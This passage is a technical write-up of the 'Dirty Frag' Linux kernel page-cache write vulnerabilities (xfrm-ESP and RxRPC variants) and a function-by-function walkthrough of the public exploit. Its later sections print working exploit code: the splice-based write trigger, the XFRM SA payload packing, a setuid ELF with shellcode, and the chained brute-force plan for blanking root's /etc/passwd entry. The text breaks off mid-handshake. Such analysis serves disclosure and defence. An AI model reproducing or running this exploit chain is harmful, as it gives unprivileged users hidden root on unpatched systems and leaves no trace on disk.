Background — Dirty Frag and the "Dirty" Lineage

The Plain-English Summary

The Linux kernel keeps file contents in RAM (the page cache) so it does not have to re-read from disk on every access. Dirty Frag is a class of vulnerabilities where an unprivileged attacker can silently overwrite selected bytes of that in-RAM copy for any file they can read, without ever touching the on-disk copy and without setting the dirty flag that would cause it to be detected or flushed.

In the xfrm-ESP variant, the attacker uses the IPsec subsystem's esp_input() receive path to achieve a precise 4-byte write at an attacker-controlled offset in any readable file's page cache. In the RxRPC variant, they use the AFS/RxRPC networking stack's packet verification path to achieve an 8-byte write via a brute-force key search. By repeating either write primitive across a target binary, the attacker injects shellcode that runs as root.

Critical — Embargo Broken Dirty Frag was reported to kernel security on April 29–30, 2026 by Hyunwoo Kim (@v4bel). A 5-day embargo was agreed with distribution maintainers on May 7, 2026. That same day, a third party independently published the full xfrm-ESP exploit, breaking the embargo, and the researcher and distro maintainers agreed to immediate full public disclosure. As of May 8, 2026: the xfrm-ESP patch is merged mainline (commit f4c50a4034e6), but the RxRPC patch has not yet been merged upstream, and no distribution has shipped either fix through standard update channels.

Affected Systems at a Glance

The xfrm-ESP vulnerability was introduced in kernel commit cac2661c53f3 (January 2017), making kernels from approximately v4.9 through the present vulnerable. The RxRPC vulnerability was introduced in commit 2dc334f1a63a (June 2023) and only affects kernels from that point forward. Together, the dual-chain exploit covers essentially every unpatched Linux kernel in the wild today. Either one or both variants apply depending on the distro and kernel configuration.

System                              ESP Variant                 RxRPC Variant                   Chain Result
Ubuntu 22.04 / 24.04                Vulnerable                  Vulnerable (rxrpc built-in)     Root via either path
RHEL 10 / CentOS Stream 10          Vulnerable                  Not affected (no rxrpc.ko)      Root via ESP only
AlmaLinux 8                         Vulnerable                  Not affected (no rxrpc.ko)      Root via ESP only
Fedora 44                           Vulnerable                  Depends on build config         Root via ESP
openSUSE Tumbleweed                 Vulnerable                  No rxrpc.ko                     Root via ESP only
Ubuntu with AppArmor user-ns block  Blocked (no CAP_NET_ADMIN)  Vulnerable (no unshare needed)  Root via RxRPC
Android                             Not affected                Not affected                    Not vulnerable
gVisor containers                   Not affected                Not affected                    Not vulnerable
AWS Fargate / Firecracker           Isolated per-VM kernel      Isolated per-VM kernel          Not vulnerable

How Copy Fail and Dirty Frag Relate

Copy Fail (CVE-2026-31431) and Dirty Frag's ESP variant share the same sink — the scatterwalk_map_and_copy() call inside crypto_authenc_esn_decrypt() that performs a 4-byte scratch write during Extended Sequence Number rearrangement. The difference is in the source path that lands attacker-controlled pages there: Copy Fail uses the AF_ALG userspace crypto socket, while Dirty Frag's ESP variant goes through the normal IPsec receive path via esp_input(). They are two different roads to the same dangerous intersection.

This distinction is critical. Copy Fail's mitigation, blacklisting the algif_aead kernel module, shuts the AF_ALG door. It does absolutely nothing to the esp_input() path, which lives in a completely different part of the kernel. Every system that applied the Copy Fail mitigation and thought it was protected is still fully exposed to Dirty Frag.

Your Copy Fail Mitigation Is Not Enough If you blacklisted algif_aead after Copy Fail, you have not protected yourself from Dirty Frag. The two exploits use different kernel entry points. You must apply the Dirty Frag mitigations separately.
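For concreteness, the Copy Fail mitigation in question is a module blacklist along these lines (file name illustrative; a sketch of the common pattern, not the exact fragment any distro shipped). Note that nothing in it touches the IPsec receive path:

```
# /etc/modprobe.d/blacklist-algif-aead.conf — Copy Fail mitigation only.
# Prevents AF_ALG's algif_aead module from loading, shutting the AF_ALG
# door. It does nothing to esp_input(), so Dirty Frag still works with
# this in place.
blacklist algif_aead
install algif_aead /bin/false
```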

Key Concepts — splice(), sk_buff Frags, and In-Place Crypto

To understand both variants, you need to understand how three kernel facilities interact in ways their designers never intended to be combined.

splice() and Zero-Copy Semantics

Normally, when a program reads a file and sends it over a network, the data has to travel: disk → kernel page cache → a copy in userspace → back into the kernel's network buffers. splice() short-circuits this: it moves data directly between two kernel file descriptors — for example, from a file directly into a pipe, or from a pipe into a socket — without ever copying bytes through userspace.

The key detail: when you splice() a file into a pipe, the kernel doesn't copy the file's bytes. It hands the pipe a reference — a pointer — to the same physical memory page already sitting in the page cache. The pipe now holds a reference to the exact same page the kernel uses to represent the file in RAM. When that pipe is then spliced into a socket, those page references travel through the network stack still attached to the original page cache memory. Internally, they end up embedded in a kernel network packet structure (struct sk_buff) as "frag" entries — pointers into pages the attacker originally only had read access to.

struct sk_buff and Nonlinear Data

Every network packet the Linux kernel processes is wrapped in a structure called struct sk_buff (socket buffer). A packet's payload can live in two places: a contiguous block of private kernel memory (the "linear" area), or spread across a list of external page fragments (the "frag" array) when zero-copy paths like splice() are used.

The distinction matters enormously here. Pages that enter the frag array via splice() are shared — the network stack does not own them exclusively; they are still the same physical pages backing the original file in the page cache. After the Dirty Frag patch, the kernel marks them with the SKBFL_SHARED_FRAG flag. Before the patch, some receive paths — specifically the IPsec ESP and RxRPC paths — never checked whether the frags they were about to decrypt in place were privately owned or externally shared.

In-Place Crypto: The Root of Both Bugs

When the kernel encrypts or decrypts data, it needs an input buffer (ciphertext) and an output buffer (plaintext). Allocating two separate buffers costs memory and time. An optimization called in-place crypto reuses the same buffer for both: it reads the ciphertext, decrypts it, and writes the plaintext back into the exact same memory location. This is completely safe — as long as that memory is a private kernel buffer that nobody else can see.

The bug: when the buffer being decrypted in-place is actually a page cache page planted there via splice(), "writing the plaintext back" means writing into the file's in-RAM copy. The kernel has just used its own crypto engine to overwrite bytes in a file the attacker was only allowed to read. The on-disk file is never touched. The dirty flag is never set. The change is invisible to every tool that looks at the disk.

The Shared Pattern Behind Both Variants Both Dirty Frag variants follow the same three-step blueprint: (1) use splice(file → pipe → socket) to plant a page cache page reference into a network packet's frag slot; (2) trigger a kernel receive path that performs in-place crypto on the packet payload without first making a private copy; (3) the decrypt operation writes attacker-influenced bytes directly into the file's page cache. The on-disk file is untouched. The change survives until the page is evicted or the cache is explicitly dropped.

Variant 1: xfrm-ESP Page-Cache Write (CVE-2026-43284)

Root Cause — The skb_cow_data Bypass

The IPsec ESP receive function esp_input() is responsible for decrypting incoming ESP-encapsulated packets. Before performing in-place AEAD decryption, it should call skb_cow_data() to allocate a private copy of any nonlinear data if the skb is "cloned" (shared). However, the function contains an optimization branch that skips this copy when conditions appear safe:

C — net/ipv4/esp4.c — vulnerable branch
static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
{
    [...]
    if (!skb_cloned(skb)) {
        if (!skb_is_nonlinear(skb)) {
            nfrags = 1;
            goto skip_cow;
        } else if (!skb_has_frag_list(skb)) {
            nfrags = skb_shinfo(skb)->nr_frags;
            nfrags++;
            goto skip_cow;  /* ← BUG: skips copy for frags! */
        }
    }
    /* Normal safe path — allocates private copy */
    err = skb_cow_data(skb, 0, &trailer);
    [...]

The logic checks: "is the skb non-cloned AND does it have frags but no frag_list?" If so, skip the cow. The reasoning was that a non-cloned skb with simple frags is safe to modify in-place. What the code failed to account for is that those frags may be externally shared pages planted by splice() — which are not cloned in the skb_cloned() sense, but are absolutely not private kernel memory.

The 4-Byte Write Primitive

Once the cow bypass is triggered, esp_input() calls crypto_authenc_esn_decrypt() on an skb whose frags contain attacker-pinned page cache pages. That function performs Extended Sequence Number rearrangement by writing 4 bytes to a specific location in the destination scatter-gather list — before HMAC authentication is verified:

C — crypto/authencesn.c — pre-auth 4-byte STORE
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
    [...]
    /* Move high-order bits of sequence number to the end. */
    scatterwalk_map_and_copy(tmp, src, 0, 8, 0);
    if (src == dst) {
        scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
        scatterwalk_map_and_copy(tmp + 1, dst,
                                   assoclen + cryptlen, 4, 1); /* ← STORE at attacker-chosen offset */
    }
    [...]
    /* HMAC verification happens HERE — after the STORE — and fails with EBADMSG */
    /* But the page cache modification already happened and is not rolled back */

The 4 bytes written come from tmp + 1 — which holds the high 32 bits of the sequence number from the SA's replay_esn->seq_hi field. The attacker registers the SA via netlink with an arbitrary seq_hi value. The write offset is assoclen + cryptlen, where cryptlen is chosen by the attacker to equal the target file offset. The attacker has full control over both the value written and where it lands.

SA Registration Requires CAP_NET_ADMIN — But User Namespaces Grant It Unlike Copy Fail's AF_ALG entry point which any user can open, registering an XFRM Security Association requires the CAP_NET_ADMIN capability — normally a root-only privilege. However, Linux user namespaces let any unprivileged user call unshare(CLONE_NEWUSER | CLONE_NEWNET) to create a sandboxed "bubble" where they appear as root and hold all capabilities, including CAP_NET_ADMIN, but only within that bubble. The host OS sees none of it. The exploit creates this sandbox for SA registration only; the actual page-cache write affects the real host. Ubuntu's default AppArmor policy blocks this unshare() call — which is exactly why the RxRPC fallback variant exists.

Exploit Flow — ELF Injection into /usr/bin/su

The ESP exploit takes the same approach as Copy Fail: overwrite the first 192 bytes of /usr/bin/su's page cache with a minimal 192-byte ELF that calls setgid(0); setuid(0); setgroups(0, NULL); execve("/bin/sh", ...). The 192 bytes are split into 48 chunks of 4 bytes each, written one at a time via the 4-byte STORE primitive.

Step 1 — Unshare into a new user+net namespace

unshare(CLONE_NEWUSER | CLONE_NEWNET) gives the child root inside the new namespace. Identity UID/GID maps are written, and loopback is brought up. This gives CAP_NET_ADMIN for XFRM SA registration.

Step 2 — Register 48 XFRM Security Associations

One SA per 4-byte chunk. Each SA uses authencesn(hmac(sha256), cbc(aes)) with UDP encapsulation (port 4500), XFRM_STATE_ESN flag, and the desired 4-byte shellcode value placed in XFRMA_REPLAY_ESN_VAL.seq_hi. The HMAC/AES keys are arbitrary — authentication will fail anyway.

Step 3 — For each 4-byte chunk: splice + send

A forged ESP wire header (SPI + seq_no + IV) is written into a pipe via vmsplice. Then 16 bytes of /usr/bin/su at offset i×4 are spliced into the pipe — planting the page cache page reference into the frag. The pipe is then spliced to a UDP socket connected to the local port with UDP_ENCAP_ESPINUDP set, sending the packet over loopback.

Step 4 — Kernel receive path triggers the STORE

The packet is routed: udp_rcv → xfrm4_udp_encap_rcv → xfrm_input → esp_input. The vulnerable skip_cow branch is taken (non-cloned, has frag, no frag_list). The crypto_authenc_esn_decrypt call writes seq_hi into the page cache at offset i×4. HMAC returns EBADMSG — but the write already happened.

Step 5 — Execute the modified binary

After 48 iterations, the full ELF payload is assembled in /usr/bin/su's page cache. The parent process (real UID) calls forkpty + execve("/usr/bin/su", "-"). The setuid-root bit is intact on disk, so the kernel runs the binary as root — but loads it from the corrupted cache. Root shell drops.

C — exp.c — one chunk trigger (simplified)
/* Forged ESP wire header: SPI(4) + seq_lo(4) + IV(16) */
uint8_t hdr[24];
*(uint32_t *)(hdr + 0) = htonl(spi);       /* per-chunk SPI */
*(uint32_t *)(hdr + 4) = htonl(100);        /* seq_lo */
memset(hdr + 8, 0xCC, 16);                  /* IV (value irrelevant) */

/* Plant page cache page P of /usr/bin/su into the pipe */
vmsplice(pfd[1], &(struct iovec){hdr, 24}, 1, 0);
splice(file_fd, &(off_t){i*4}, pfd[1], NULL, 16, SPLICE_F_MOVE);

/* Send pipe → socket: MSG_SPLICE_PAGES auto-set, page stays as frag */
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);

/* esp_input() takes skip_cow branch → authencesn_decrypt writes seq_hi at offset i*4
   EBADMSG returned but write is permanent — page cache modified */

Variant 2: RxRPC Page-Cache Write (CVE-2026-43500)

Root Cause — In-Place pcbc(fcrypt) Decrypt on Spliced Frags

RxRPC is the Linux kernel's implementation of the AFS (Andrew File System) RPC transport protocol. When a connection uses RXKAD security at the RXRPC_SECURITY_AUTH level, incoming data packets are verified by rxkad_verify_packet_1(), which performs an in-place 8-byte decrypt using pcbc(fcrypt) — the classic AFS cipher — to validate packet integrity.

C — net/rxrpc/rxkad.c — vulnerable in-place decrypt
static int rxkad_verify_packet_1(struct rxrpc_call *call,
                                  struct sk_buff *skb, ...)
{
    [...]
    sg_init_table(sg, ARRAY_SIZE(sg));
    ret = skb_to_sgvec(skb, sg, sp->offset, 8); /* converts frags to SGL */

    memset(&iv, 0, sizeof(iv));
    skcipher_request_set_crypt(req, sg, sg, 8, iv.x); /* src == dst: IN-PLACE */
    ret = crypto_skcipher_decrypt(req); /* 8-byte STORE directly into frag */

    /* If frag is a page cache page (planted via splice): 
       8 bytes written into that file's in-RAM copy */

The code preceding this function (call_event.c:337) only unshares the skb if skb_cloned(skb) is true. A non-linear skb with page cache pages in its frags via splice() is not cloned in that sense, so it bypasses the copy and hits the in-place decrypt path directly.

The 8-Byte Brute-Forced Write Primitive

Unlike the ESP variant's clean 4-byte arbitrary write, the RxRPC variant provides a more constrained primitive: the 8 bytes written into the page cache are fcrypt_decrypt(C, K) — the result of decrypting the 8-byte ciphertext C (currently at the target file offset) with key K (the attacker's RxRPC session key).

The attacker controls K via add_key("rxrpc", ...), which requires no privileges at all. Since fcrypt is a deterministic public algorithm with a 56-bit key space, and because the IV is zero and only one 8-byte block is decrypted, pcbc(fcrypt) reduces to a single fcrypt_decrypt(C, K) call with no chaining. The attacker can therefore brute-force the desired plaintext in userspace: iterate over candidate keys K until fcrypt_decrypt(C, K) produces the bytes they want to plant. This sounds expensive, but the target bytes only need to satisfy loose conditions — not all 8 bytes are fully constrained — making the search tractable. A userspace port of crypto/fcrypt.c runs at ~18 million keys/second, completing each search in well under 1 second.

No CAP_NET_ADMIN Required This is the key advantage of the RxRPC variant over the ESP variant. add_key("rxrpc", ...), socket(AF_RXRPC), and splice() are all available to completely unprivileged users. No user namespace creation is needed. On Ubuntu, where AppArmor blocks unshare(CLONE_NEWUSER) by default, the RxRPC variant is the path to root.

Exploit Flow — /etc/passwd Nulling

Writing an arbitrary static ELF via 8-byte brute-force is impractical (full 56-bit key space with all 8 bytes constrained). So the RxRPC exploit targets a more achievable goal: null the passwd field of root's entry in /etc/passwd line 1, turning it from root:x:0:0:... into root::0:0:.... PAM's pam_unix.so with the nullok option then accepts an empty password for root — letting su succeed without any credential.

The target: chars 4–15 of /etc/passwd line 1 must become ::0:0:GGGGG:. Only 12 bytes need to be decided, and 5 of those (the fill chars at positions 10–14) just need to be any printable non-colon character — a weak enough constraint to make the brute force feasible in milliseconds.

Three overlapping 8-byte STOREs with last-write-wins semantics accomplish this:

Text — /etc/passwd line 1 — before and after
File offset:  0 1 2 3 4  5 6 7 8 9 10 11 12 13 14 15
Original:     r o o t :  x : 0 : 0  :  r  o  o  t  :

splice A @ offset 4  (8B) → writes chars 4..11
splice B @ offset 6  (8B) → writes chars 6..13  (overwrites 6..11 from A)
splice C @ offset 8  (8B) → writes chars 8..15  (overwrites 8..13 from B)

Result:       r o o t :  : 0 : 0 :  G  G  G  G  G  :
              └──────────────────────────────────────┘
              root::0:0:GGGGG:/root:/bin/bash  ← empty passwd, PAM nullok passes

For each STORE, a userspace brute-force search finds the RxRPC key K such that fcrypt_decrypt(C, K) == desired_plaintext. The ciphertext seen by each subsequent splice is the plaintext left by the previous STORE — so the brute forces must be chained, each accounting for the mutation left by the last.

After all three STOREs, the parent process calls forkpty + execve("/usr/bin/su", "-"). PAM reads the modified /etc/passwd from page cache, sees an empty password field, and with nullok grants the login without a password prompt. su performs setresuid(0, 0, 0) and drops into /bin/bash as root.


Why Chaining? Covering Each Other's Blind Spots

Neither variant works universally on its own. The ESP variant requires CAP_NET_ADMIN — achievable via user namespaces, but Ubuntu's default AppArmor policy blocks unprivileged unshare(CLONE_NEWUSER). The RxRPC variant requires no privileges, but rxrpc.ko is not included in most enterprise distributions (RHEL, CentOS, AlmaLinux ship without it). Together, they cover the full distribution landscape:

ESP Variant (CVE-2026-43284) — xfrm-ESP Page-Cache Write

  • 4-byte arbitrary STORE, fully controlled value and offset
  • Writes 192-byte ELF into /usr/bin/su page cache
  • Needs unshare(CLONE_NEWUSER|NEWNET) in a child process
  • Blocked by Ubuntu AppArmor user-ns policy by default
  • Works on RHEL, Fedora, CentOS, openSUSE, AlmaLinux
  • Wall-clock cost: ~7 seconds (48 writes x 150ms sleep each)
  • Patched: mainline commit f4c50a4034e6

RxRPC Variant (CVE-2026-43500) — RxRPC Page-Cache Write

  • 8-byte brute-forced STORE via userspace fcrypt key search
  • Nulls password field in /etc/passwd root entry
  • Zero privileges required, no namespace creation needed
  • Requires rxrpc.ko to be present and loadable
  • Works on Ubuntu (rxrpc.ko built and loadable by default)
  • No upstream patch merged as of May 8, 2026

The combined exploit logic tries ESP first. If it succeeds, the parent process confirms by checking the 8-byte marker in /usr/bin/su's page cache and then runs su - to get a root shell through the injected ELF. If the ESP attempt fails, for example because unshare() returned EPERM, or because esp4.ko is absent, the exploit falls back to the RxRPC path and nulls the root password field in /etc/passwd instead.

One Binary. Every Major Distro. Seconds to Root. The public exp.c is a single C file. Compiled with gcc -O0 -Wall -o exp exp.c -lutil, it runs the full chain automatically, selects the appropriate variant, and delivers a root shell on Ubuntu, RHEL, Fedora, openSUSE, CentOS, and AlmaLinux. No kernel symbols. No heap grooming. No timing windows.
Post-Exploit Cleanup Required Unlike Copy Fail, Dirty Frag leaves the page cache in a contaminated state after exploitation — the modified pages persist even if the exploit exits. On systems where this matters (production hosts), you must run echo 3 > /proc/sys/vm/drop_caches or reboot after exploitation to restore correct file contents. From a forensics perspective this means the in-memory evidence is easily wiped while the on-disk files remain untouched.

PoC Deep Dive — Reading exp.c

The public exploit (exp.c, 1951 lines, C) is a single self-contained file that implements both attack variants plus the chaining logic. There is no Python, no scripting, no compiled kernel module — just a standard C binary linked against -lutil for the PTY helper. Let's walk through exactly what it does, function by function.

Top-Level Structure and the Chain Logic

The binary is a single C file (~1951 lines) with three logical sections compiled together: su_lpe_main() for the ESP/xfrm path targeting /usr/bin/su, rxrpc_lpe_main() for the RxRPC path targeting /etc/passwd, and main() which chains them. The chaining logic is more sophisticated than a simple fallback — it checks whether either target is already patched before deciding what to run, and retries the RxRPC path up to 3 times:

C — exp.c — main() chain logic (actual code)
/* If already running as root somehow, just exec bash */
if (getuid() == 0) { execlp("/bin/bash", "bash", NULL); }

/* Append "--corrupt-only" to argv for both sub-mains */
co_argv = append_corrupt_only(argc, argv, &new_argc);

if (!verbose) silence_stderr(&saved_err); /* suppress noise by default */

if (force_rxrpc) {
    /* --force-rxrpc: only try RxRPC path, up to 3 retries */
    rc = rxrpc_lpe_main(new_argc, co_argv);
    for (int i = 0; !passwd_already_patched() && i < 3; i++)
        rc = rxrpc_lpe_main(new_argc, co_argv);
} else if (force_esp) {
    /* --force-esp: only try ESP path */
    rc = su_lpe_main(new_argc, co_argv);
} else {
    /* Default: try ESP first */
    rc = su_lpe_main(new_argc, co_argv);
    if (!su_already_patched()) {
        /* ESP didn't land — fall back to RxRPC, retry up to 3× */
        rc = rxrpc_lpe_main(new_argc, co_argv);
        for (int i = 0; !passwd_already_patched() && i < 3; i++)
            rc = rxrpc_lpe_main(new_argc, co_argv);
    }
}

if (!verbose) restore_stderr(saved_err);

/* If either target is patched, open a root PTY via /usr/bin/su */
if (either_target_patched()) {
    run_root_pty(); /* spawns `su -` in fresh PTY, bridges tty */
    return 0;
}

Two helper functions check whether either target has been successfully poisoned. They work because pread() on a file whose page cache was modified reads the in-memory version — the on-disk file is untouched:

C — exp.c — success detection helpers
/* Check if /usr/bin/su page cache contains our injected shellcode.
   Looks for the 8 bytes at offset 0x78: 31 ff 31 f6 31 c0 b0 6a
   = "xor edi,edi; xor esi,esi; xor eax,eax; mov al,0x6a(setgid)"
   These bytes are unique to our payload — the real su never has them. */
static const uint8_t su_marker[8] = {
    0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a
};
static int su_already_patched(void) {
    int fd = open("/usr/bin/su", O_RDONLY);
    uint8_t got[8];
    pread(fd, got, 8, 0x78);  /* reads from page cache, not disk */
    return memcmp(got, su_marker, 8) == 0;
}

/* Check if /etc/passwd root entry starts with "root::0:0" — empty passwd */
static int passwd_already_patched(void) {
    int fd = open("/etc/passwd", O_RDONLY);
    char head[16];
    pread(fd, head, 16, 0);
    return memcmp(head, "root::0:0", 9) == 0;
}

The final stage — common to both paths — is run_root_pty(). It opens a PTY pair with posix_openpt(), forks a child that execs su - with the slave PTY as its stdin/stdout/stderr, and bridges the parent's terminal to the master side. If PAM prompts for a password (which it will in the RxRPC path since pam_unix.so nullok still shows a prompt on some configs), the bridge auto-injects a single newline — the empty password that the patched /etc/passwd entry now accepts. By default, all stderr output from the sub-mains is suppressed with silence_stderr(), making the exploit appear to the user as a clean single command that produces a root shell.

Why pread() reveals the page cache modification After either variant runs, pread() on the target file reads from the page cache — the kernel's in-memory copy — not from disk. The exploit never sets the dirty flag, so the on-disk file is identical to before. But the in-memory copy reflects the STORE that happened. This is the same property that makes the attack invisible to file integrity tools, and here the exploit exploits it again to check its own success.

The Injected ELF Payload

The 192-byte shell_elf[] array embedded in the binary is a fully valid, self-contained x86-64 ELF executable. It is not shellcode bolted onto a template — it is a minimal but correct ELF with a real header and a PT_LOAD program header. Here is what it does:

  • ELF header (64 bytes): e_type=ET_EXEC, e_machine=EM_X86_64, entry point at virtual address 0x400078
  • PT_LOAD segment (56 bytes): maps file bytes 0..0xb7 to virtual address 0x400000, flags R+X (readable and executable)
  • Shellcode (45 bytes at file offset 0x78 = vaddr 0x400078): calls setgid(0), setuid(0), setgroups(0, NULL), then execve("/bin/sh", NULL, envp) where envp = ["TERM=xterm", NULL]
  • String data: "TERM=xterm\0" at offset 0xa5 and "/bin/sh\0" at offset 0xb0

The TERM=xterm environment variable is intentionally set — without it, /etc/bash.bashrc and similar shell init scripts emit "No value for $TERM" errors that would clutter the root shell output.

Because /usr/bin/su has its setuid-root bit set on disk (the exploit never touches the disk), the kernel runs this injected ELF with effective UID 0 (root). The ELF's shellcode then locks in root with setuid(0)/setgid(0) and spawns /bin/sh.

asm — shellcode at ELF offset 0x78 (entry point 0x400078)
; syscall numbers: setgid=0x6a(106), setuid=0x69(105), setgroups=0x74(116), execve=0x3b(59)
31 ff          xor    edi, edi           ; arg0 = 0
31 f6          xor    esi, esi
31 c0          xor    eax, eax
b0 6a          mov    al, 0x6a           ; setgid(0)
0f 05          syscall
b0 69          mov    al, 0x69           ; setuid(0)
0f 05          syscall
b0 74          mov    al, 0x74           ; setgroups(0, NULL)
0f 05          syscall
6a 00          push   0               ; envp[1] = NULL sentinel
48 8d 05 12 00 00 00  lea rax,[rip+0x12]  ; rax → "TERM=xterm\0" at 0xa5
50             push   rax             ; envp[0] = "TERM=xterm"
48 89 e2       mov    rdx, rsp        ; rdx = envp[]
48 8d 3d 12 00 00 00  lea rdi,[rip+0x12]  ; rdi → "/bin/sh\0" at 0xb0
31 f6          xor    esi, esi        ; rsi = NULL (argv)
6a 3b          push   0x3b
58             pop    rax             ; rax = 59 (execve)
0f 05          syscall             ; execve("/bin/sh", NULL, ["TERM=xterm",NULL])

ESP Variant: setup_userns_netns() and add_xfrm_sa()

corrupt_su() first calls setup_userns_netns(), which creates the user+net namespace sandbox. This is where CAP_NET_ADMIN is acquired. The UID map written is "0 <real_uid> 1" — meaning inside this namespace, real UID 1000 (or whatever your UID is) maps to UID 0. Loopback is brought UP with SIOCSIFFLAGS because the exploit routes packets over loopback, and loopback is DOWN by default in a fresh netns.

Then all 48 XFRM SAs are registered upfront in one batch before any trigger fires — one SA per 4-byte chunk of shell_elf[]. Each SA has a unique SPI (0xDEADBE10 + i) and carries the chunk value in esn->seq_hi packed as a big-endian uint32_t:

C — exp.c — packing shellcode chunk into seq_hi (big-endian)
for (int i = 0; i < PAYLOAD_LEN / 4; i++) {  /* 48 iterations */
    uint32_t spi     = 0xDEADBE10 + i;
    uint32_t seqhi   =
        ((uint32_t)shell_elf[i*4 + 0] << 24) |  /* most-significant byte first */
        ((uint32_t)shell_elf[i*4 + 1] << 16) |
        ((uint32_t)shell_elf[i*4 + 2] <<  8) |
        ((uint32_t)shell_elf[i*4 + 3]);
    add_xfrm_sa(spi, seqhi);  /* registers SA via NETLINK_XFRM */
}

Inside add_xfrm_sa(), a raw NETLINK_XFRM socket sends an XFRM_MSG_NEWSA message. The SA configuration is: protocol IPPROTO_ESP, transport mode, XFRM_STATE_ESN flag set, algorithm hmac(sha256) + cbc(aes) with arbitrary keys (0xAA and 0xBB filled), UDP encapsulation on port 4500, and the replay state with seq_hi = patch_seqhi (the shellcode chunk). The HMAC and AES keys are arbitrary because HMAC verification will always fail — that's by design.

ESP Variant: do_one_write() — The Write Trigger

For each of the 48 chunks, do_one_write() fires the actual kernel-side write. This is the most important function in the ESP path. It:

C — exp.c — do_one_write() annotated
/* 1. sk_recv: UDP socket on 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP.
      Any UDP packets arriving here that look like ESP are redirected
      into xfrm_input() → esp_input() by the kernel automatically. */
int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
bind(sk_recv, &sa_d, ...);         /* 127.0.0.1:4500 */
setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, UDP_ENCAP_ESPINUDP, ...);

/* 2. sk_send: a regular UDP socket connected to 127.0.0.1:4500.
      Sending here delivers to sk_recv over loopback. */
int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
connect(sk_send, &sa_d, ...);

/* 3. Build the forged ESP wire header in a local buffer.
      Format: [SPI: 4B] [seq_lo: 4B] [IV: 16B] = 24 bytes total.
      SEQ_VAL = 200 (hardcoded). IV is 0xCC-filled (value irrelevant —
      authentication fails anyway). */
uint8_t hdr[24];
*(uint32_t*)(hdr + 0) = htonl(spi);      /* this chunk's SPI */
*(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);  /* SEQ_VAL = 200 */
memset(hdr + 8, 0xCC, 16);              /* AES-CBC IV */

/* 4. vmsplice: put the 24-byte header into the pipe's write end.
      The data lives in user-space (local array), so this is a normal
      copy into the pipe buffer. */
vmsplice(pfd[1], &iov_h, 1, 0);

/* 5. splice: move 16 bytes of /usr/bin/su starting at byte (i*4) into
      the pipe. CRITICAL: 'off' is passed as a pointer so the kernel
      uses it as the file offset. This is a zero-copy operation — the
      pipe now holds a reference to the actual page cache page of
      /usr/bin/su, not a copy of its bytes. */
off_t off = offset;   /* = PATCH_OFFSET + i*4 */
splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);

/* 6. splice: move the pipe contents (24+16 = 40 bytes) into sk_send.
      splice() to a socket automatically sets MSG_SPLICE_PAGES, which
      tells the kernel to keep the page-cache page as a frag in the
      skb rather than copying it. The page is now in skb->frags[0]. */
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);

/* 7. Wait 150ms. The kernel routes the packet over loopback to sk_recv,
      which sees it as a UDP-encapsulated ESP packet and calls esp_input().
      The sleep ensures the kernel has processed the packet before we
      close the file descriptor and the pipe. */
usleep(150 * 1000);

/* fds closed. The page cache of /usr/bin/su at byte (i*4) now holds
   the 4 bytes from shell_elf[i*4..i*4+3]. The on-disk file is unchanged.
   EBADMSG was returned inside esp_input() but the STORE already happened. */

The 150ms sleep — not truly race-free The write-up calls this "deterministic" because there is no data race (no concurrent threads fighting over the same memory). However, do_one_write() does include a usleep(150ms) after the final splice(). This sleep exists to give the kernel time to deliver the packet through the loopback stack and trigger esp_input() before the pipe and socket file descriptors are closed. "Deterministic" means the outcome is predictable and reproducible, not that timing is irrelevant.

RxRPC Variant: Key Setup and Fake Handshake

The RxRPC path does not use unshare() by default. Looking at the actual code, rxrpc_lpe_main() only calls do_unshare_userns_netns() if the environment variable POC_UNSHARE=1 is explicitly set — it is opt-in, not the default. The path operates entirely with normal user privileges. The exploit first opens a dummy socket(AF_RXRPC, SOCK_DGRAM, PF_INET) and closes it immediately; its sole purpose is to make the kernel autoload the rxrpc.ko module via the MODULE_ALIAS_NETPROTO(PF_RXRPC) alias. Without this step, subsequent add_key("rxrpc", ...) calls fail with ENODEV because the kernel's "rxrpc" key type is registered only when the module loads.

The exploit then mmaps the first page of /etc/passwd with MAP_SHARED | PROT_READ. This keeps the page cache page pinned in memory throughout the exploit and also lets the code verify the result after triggering by reading from the mmap pointer directly — which reflects the live in-memory state, not a cached fd read.

The setup involves four cooperating pieces per trigger:

  • RxRPC key (add_key("rxrpc", desc, token, len, KEY_SPEC_PROCESS_KEYRING)): a fake AFS/Kerberos v1 token with the cell name "evil", sec_ix=2 (RXKAD), and the 8-byte brute-forced key K placed in the session_key field. Each trigger gets a unique key name ("evil0", "evil1", "evil2") to avoid stale state. After the trigger fires the key is explicitly invalidated with keyctl(KEYCTL_INVALIDATE, key).
  • Fake server: a plain socket(AF_INET, SOCK_DGRAM) bound to 127.0.0.1:port_S. Ports rotate as 7777 + (trigger_seq * 2 % 200) to avoid bind collisions with sockets left over from earlier triggers.
  • AF_RXRPC client: socket(AF_RXRPC, SOCK_DGRAM, PF_INET) configured with the attack key via RXRPC_SECURITY_KEY and RXRPC_MIN_SECURITY_LEVEL = RXRPC_SECURITY_AUTH (1).
  • AF_ALG pcbc(fcrypt) socket: used purely in userspace to precompute the wire cksum field that the forged DATA packet must carry to pass the first verification gate in rxkad_verify_packet() before reaching the vulnerable in-place decrypt in rxkad_verify_packet_1().

The handshake sequence is:

C — exp.c — do_one_trigger() handshake flow
/* Step 1: client initiates RPC call → sends a DATA packet to port_S */
rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD);

/* Step 2: fake server receives the client's initial packet, extracts
   the session identifiers (epoch, cid, callNumber) needed to forge
   a valid-looking reply later. */
udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500);
epoch  = ntohl(whdr_in->epoch);
cid    = ntohl(whdr_in->cid);
callN  = ntohl(whdr_in->callNumber);

/* Step 3: fake server sends a CHALLENGE packet (type=6, RXKAD security).
   nonce=0xDEADBEEF, min_level=1 (RXRPC_SECURITY_AUTH).
   The client's kernel RxRPC stack processes this automatically and
   sends back a RESPONSE containing K encrypted under the session key.
